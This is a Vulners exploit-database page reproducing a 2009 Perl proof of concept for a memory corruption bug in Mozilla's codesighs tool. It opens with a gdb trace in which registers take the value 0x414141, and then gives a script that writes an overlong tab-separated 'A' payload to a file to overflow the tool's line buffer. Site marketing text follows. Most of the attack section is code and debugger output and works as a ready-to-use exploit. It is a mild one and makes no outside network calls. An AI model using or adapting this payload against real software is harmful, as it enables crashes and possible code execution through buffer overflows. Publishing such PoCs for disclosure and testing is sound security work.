Vulners
Lucene search
Mozilla Codesighs Memory Corruption PoC
=======================================
Mozilla Codesighs Memory Corruption PoC
=======================================
# Title: Mozilla Codesighs Memory Corruption PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremy Brown
# Published: 2009-12-12
# Verified: yes
view source
print?
#!/usr/bin/perl
# thedailyshow.pl
# AKA
# Mozilla Codesighs Memory Corruption PoC
#
#
# *********************************************************************************************************
#
# 257 while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
# (gdb)
# 259 trimWhite(lineBuffer);
# (gdb)
# trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 145 times>...) at codesighs.c:213
# 213 int len = strlen(inString);
# (gdb)
# 215 while(len)
# (gdb)
# 217 len--;
# (gdb)
# 219 if(isspace(*(inString + len)))
# (gdb)
# 221 *(inString + len) = '\0';
# (gdb)
# 215 while(len)
# (gdb)
# 217 len--;
# (gdb)
# 219 if(isspace(*(inString + len)))
# (gdb)
# 228 }
# (gdb)
# codesighs (inOptions=0xbffff350) at codesighs.c:261
# 261 scanRes = sscanf(lineBuffer,
# (gdb) i r
# eax 0x0 0
# ecx 0xb7fe468c -1208072564
# edx 0x82 130
# ebx 0x9d8ff4 10326004
# esp 0xbfffd040 0xbfffd040
# ebp 0xbffff328 0xbffff328
# esi 0x0 0
# edi 0x0 0
# eip 0x8048945 0x8048945 <codesighs+142>
# eflags 0x246 [ PF ZF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb) s
# 270 if(6 == scanRes)
# (gdb) i r
# eax 0x6 6
# ecx 0x414141 4276545
# edx 0x0 0
# ebx 0x9d8ff4 10326004
# esp 0xbfffd040 0xbfffd040
# ebp 0xbffff328 0xbffff328
# esi 0x0 0
# edi 0x0 0
# eip 0x804899d 0x804899d <codesighs+230>
# eflags 0x282 [ SF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb)
#
# http://jbrownsec.blogspot.com/2009/12/mozilla-code-sighs.html
#
# "Can't read my, can't read my, no she can't read my poker face"
#
# *********************************************************************************************************
# thedailyshow.pl
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename>\n";
exit;
}
$payload = "1\tCODE\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 260 . "\t";
open(FILE, ">", $filename) or die("\nError: Can't write to $filename");
print FILE $payload;
close(FILE);
print "Wrote payload to \"$filename\"\n";
exit;
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8